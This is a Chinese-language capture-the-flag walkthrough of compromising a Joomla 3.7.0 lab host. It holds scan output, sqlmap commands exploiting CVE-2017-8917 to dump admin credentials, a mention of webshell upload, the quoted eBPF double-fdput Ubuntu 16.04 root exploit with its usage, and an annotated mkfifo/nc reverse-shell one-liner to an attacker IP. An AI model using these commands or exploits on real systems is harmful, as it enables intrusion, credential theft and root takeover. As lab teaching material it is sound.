目标:该靶场有1个flag文件,找到该文件。
一,信息收集
1,确定主机和靶场ip
确定靶场IP是192.168.101.51
2,端口扫描
只开了一个80端口
3,敏感目录扫描
dirb http://192.168.101.51/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Apr 9 07:19:18 2023
URL_BASE: http://192.168.101.51/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.101.51/ ----
==> DIRECTORY: http://192.168.101.51/administrator/
==> DIRECTORY: http://192.168.101.51/bin/
==> DIRECTORY: http://192.168.101.51/cache/
==> DIRECTORY: http://192.168.101.51/components/
==> DIRECTORY: http://192.168.101.51/images/
==> DIRECTORY: http://192.168.101.51/includes/
+ http://192.168.101.51/index.php (CODE:200|SIZE:7109)
==> DIRECTORY: http://192.168.101.51/language/
==> DIRECTORY: http://192.168.101.51/layouts/
==> DIRECTORY: http://192.168.101.51/libraries/
==> DIRECTORY: http://192.168.101.51/media/
==> DIRECTORY: http://192.168.101.51/modules/
==> DIRECTORY: http://192.168.101.51/plugins/
+ http://192.168.101.51/server-status (CODE:403|SIZE:302)
==> DIRECTORY: http://192.168.101.51/templates/
==> DIRECTORY: http://192.168.101.51/tmp/
---- Entering directory: http://192.168.101.51/administrator/ ----
==> DIRECTORY: http://192.168.101.51/administrator/cache/
==> DIRECTORY: http://192.168.101.51/administrator/components/
==> DIRECTORY: http://192.168.101.51/administrator/help/
==> DIRECTORY: http://192.168.101.51/administrator/includes/
+ http://192.168.101.51/administrator/index.php (CODE:200|SIZE:4803)
==> DIRECTORY: http://192.168.101.51/administrator/language/
==> DIRECTORY: http://192.168.101.51/administrator/logs/
==> DIRECTORY: http://192.168.101.51/administrator/modules/
==> DIRECTORY: http://192.168.101.51/administrator/templates/
---- Entering directory: http://192.168.101.51/bin/ ----
+ http://192.168.101.51/bin/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.51/cache/ ----
+ http://192.168.101.51/cache/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.51/components/ ----
+ http://192.168.101.51/components/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.51/images/ ----
==> DIRECTORY: http://192.168.101.51/images/banners/
==> DIRECTORY: http://192.168.101.51/images/headers/
+ http://192.168.101.51/images/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.51/includes/ ----
+ http://192.168.101.51/includes/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.51/language/ ----
+ http://192.168.101.51/language/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.51/layouts/ ----
+ http://192.168.101.51/layouts/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.51/layouts/joomla/
==> DIRECTORY: http://192.168.101.51/layouts/libraries/
==> DIRECTORY: http://192.168.101.51/layouts/plugins/
---- Entering directory: http://192.168.101.51/libraries/ ----
==> DIRECTORY: http://192.168.101.51/libraries/cms/
+ http://192.168.101.51/libraries/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.51/libraries/joomla/
==> DIRECTORY: http://192.168.101.51/libraries/legacy/
+ http://192.168.101.51/libraries/vendor (CODE:403|SIZE:305)
---- Entering directory: http://192.168.101.51/media/ ----
==> DIRECTORY: http://192.168.101.51/media/cms/
==> DIRECTORY: http://192.168.101.51/media/contacts/
==> DIRECTORY: http://192.168.101.51/media/editors/
+ http://192.168.101.51/media/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.51/media/mailto/
==> DIRECTORY: http://192.168.101.51/media/media/
==> DIRECTORY: http://192.168.101.51/media/system/
---- Entering directory: http://192.168.101.51/modules/ ----
+ http://192.168.101.51/modules/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.51/plugins/ ----
==> DIRECTORY: http://192.168.101.51/plugins/authentication/
==> DIRECTORY: http://192.168.101.51/plugins/captcha/
==> DIRECTORY: http://192.168.101.51/plugins/content/
==> DIRECTORY: http://192.168.101.51/plugins/editors/
==> DIRECTORY: http://192.168.101.51/plugins/extension/
==> DIRECTORY: http://192.168.101.51/plugins/fields/
+ http://192.168.101.51/plugins/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.51/plugins/installer/
==> DIRECTORY: http://192.168.101.51/plugins/search/
==> DIRECTORY: http://192.168.101.51/plugins/system/
==> DIRECTORY: http://192.168.101.51/plugins/user/
---- Entering directory: http://192.168.101.51/templates/ ----
+ http://192.168.101.51/templates/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.51/templates/system/
---- Entering directory: http://192.168.101.51/tmp/ ----
+ http://192.168.101.51/tmp/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.51/tmp/packages/
---- Entering directory: http://192.168.101.51/administrator/cache/ ----
+ http://192.168.101.51/administrator/cache/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.51/administrator/components/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/administrator/help/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/administrator/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/administrator/language/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/administrator/logs/ ----
+ http://192.168.101.51/administrator/logs/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.51/administrator/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/administrator/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/images/banners/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/images/headers/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/layouts/joomla/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/layouts/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/layouts/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/libraries/cms/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/libraries/joomla/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/libraries/legacy/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/media/cms/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/media/contacts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/media/editors/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/media/mailto/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/media/media/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/media/system/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/plugins/authentication/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/plugins/captcha/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/plugins/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/plugins/editors/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/plugins/extension/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/plugins/fields/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/plugins/installer/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/plugins/search/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/plugins/system/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/plugins/user/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/templates/system/ ----
==> DIRECTORY: http://192.168.101.51/templates/system/css/
==> DIRECTORY: http://192.168.101.51/templates/system/html/
==> DIRECTORY: http://192.168.101.51/templates/system/images/
+ http://192.168.101.51/templates/system/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.101.51/tmp/packages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/templates/system/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/templates/system/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.51/templates/system/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sun Apr 9 07:20:14 2023
DOWNLOADED: 83016 - FOUND: 20
扫描到了后台目录
二,漏洞探测
nmap --script=vuln -p 80 192.168.101.51
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-09 07:24 EDT
Nmap scan report for 192.168.101.51
Host is up (0.00043s latency).
PORT STATE SERVICE
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.101.51
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.101.51:80/
| Form id: login-form
| Form action: /index.php
|
| Path: http://192.168.101.51:80/index.php/component/users/?view=reset&Itemid=101
| Form id: user-registration
| Form action: /index.php/component/users/?task=reset.request&Itemid=101
|
| Path: http://192.168.101.51:80/index.php/component/users/?view=reset&Itemid=101
| Form id: login-form
| Form action: /index.php/component/users/?Itemid=101
|
| Path: http://192.168.101.51:80/index.php/component/users/?view=remind&Itemid=101
| Form id: user-registration
| Form action: /index.php/component/users/?task=remind.remind&Itemid=101
|
| Path: http://192.168.101.51:80/index.php/component/users/?view=remind&Itemid=101
| Form id: login-form
| Form action: /index.php/component/users/?Itemid=101
|
| Path: http://192.168.101.51:80/index.php
| Form id: login-form
| Form action: /index.php
|
| Path: http://192.168.101.51:80/index.php/2-uncategorised/1-welcome
| Form id: login-form
|_ Form action: /index.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /administrator/: Possible admin folder
| /administrator/index.php: Possible admin folder
| /administrator/manifests/files/joomla.xml: Joomla version 3.7.0
| /language/en-GB/en-GB.xml: Joomla version 3.7.0
| /htaccess.txt: Joomla!
| /README.txt: Interesting, a readme.
| /bin/: Potentially interesting folder
| /cache/: Potentially interesting folder
| /images/: Potentially interesting folder
| /includes/: Potentially interesting folder
| /libraries/: Potentially interesting folder
| /modules/: Potentially interesting folder
| /templates/: Potentially interesting folder
|_ /tmp/: Potentially interesting folder
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2017-8917:
| VULNERABLE:
| Joomla! 3.7.0 'com_fields' SQL Injection Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2017-8917
| Risk factor: High CVSSv3: 9.8 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
| An SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers
| to execute aribitrary SQL commands via unspecified vectors.
|
| Disclosure date: 2017-05-17
| Extra information:
| User: root@localhost
| References:
| https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917
MAC Address: 00:0C:29:C4:EF:66 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 320.82 seconds
扫描出来2个漏洞:CVE-2007-6750,CVE-2017-8917。
三,漏洞利用
使用MSF查找该漏洞
使用Exploit-db漏洞搜索下
cat 42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)
获取数据库
获取表名
获取列名
获取账号和密码
sqlmap -u "http://192.168.101.51/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
sqlmap -u "http://192.168.101.51/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
sqlmap -u "http://192.168.101.51/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T #__users --columns -p list[fullordering]
sqlmap -u "http://192.168.101.51/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D 'joomladb' -T '#__users' -C "username,password" --dump使用john工具对密码进行破解
获取到 账号:admin 密码:snoopy
登录后台管理
写入一句话木马
使用中国蚁剑进行连接
四,权限提升
进行反弹shell,保持持久性连接
进行提权
查看当前操作系统的版本信息和当前操作系统的发行版本信息
命令:cat /proc/version
cat /etc/issue
当前操作系统的版本信息:Linux version 4.4.0-21
当前操作系统的发行版本信息: Ubuntu 16.04
排除思路:先把后缀名是.C的排除,C语言脚本利用起来比较麻烦 ,然后利用操作系统的版本信息进行排除,最后只剩下39772.txt这个文件了。
39772.txt
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.
When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:
/* look for pseudo eBPF instructions that access map FDs and
* replace them with actual map pointers
*/
static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
struct bpf_insn *insn = env->prog->insnsi;
int insn_cnt = env->prog->len;
int i, j;
for (i = 0; i < insn_cnt; i++, insn++) {
[checks for bad instructions]
if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
struct bpf_map *map;
struct fd f;
[checks for bad instructions]
f = fdget(insn->imm);
map = __bpf_map_get(f);
if (IS_ERR(map)) {
verbose("fd %d is not pointing to valid bpf_map\n",
insn->imm);
fdput(f);
return PTR_ERR(map);
}
[...]
}
}
[...]
}
__bpf_map_get contains the following code:
/* if error is returned, fd is released.
* On success caller should complete fd access with matching fdput()
*/
struct bpf_map *__bpf_map_get(struct fd f)
{
if (!f.file)
return ERR_PTR(-EBADF);
if (f.file->f_op != &bpf_map_fops) {
fdput(f);
return ERR_PTR(-EINVAL);
}
return f.file->private_data;
}
The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.
A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.
One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.
There are two problems with this approach:
The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).
In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)
writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.
An exploit that puts all this together is in exploit.tar. Usage:
user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)
This exploit was tested on a Ubuntu 16.04 Desktop system.
Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7
Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip 下载链接
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
访问找不到,试着直接去官网查找
官网上下载的文件内容
思路:把该文件里面的exploit.tar上传到目标机的可利用目录里,解压完有个compile.sh和doubleput脚本,运行这2个脚本就可以了
五,总结
2,John工具
3,当nc没有-e参数时,可以使用rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 攻击者ip 端口 > /tmp/f 。
原理:
1,rm /tmp/f: 首先删除l临时文件f,以免造成冲突,(后面的分号;表述依次逐个执行后面的命令。)
2,mkfifo /tmp/f: mkfifo是Linux中专门用来创建管道的命令,我们可以在一个终端中创建一个管道符,传入一个命令后,在另一个终端接收即可获取数据(使用重定向符<的话可以持续接收!比如cat < 临时文件)。
3, cat /tmp/f | /bin/bash -i 2>&1 | nc IP 端口 >/tmp/f
cat /tmp/f: 首先读取新创建的临时文件,并将内容通过管道符传给下一个命令
/bin/bash -i 2>&1 | nc IP 端口 >/tmp/f: 先将上一步获取到的命令在bash终端中执行,并将结果通过nc输出到目标,并且将目标的命令重新写入临时文件f.
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
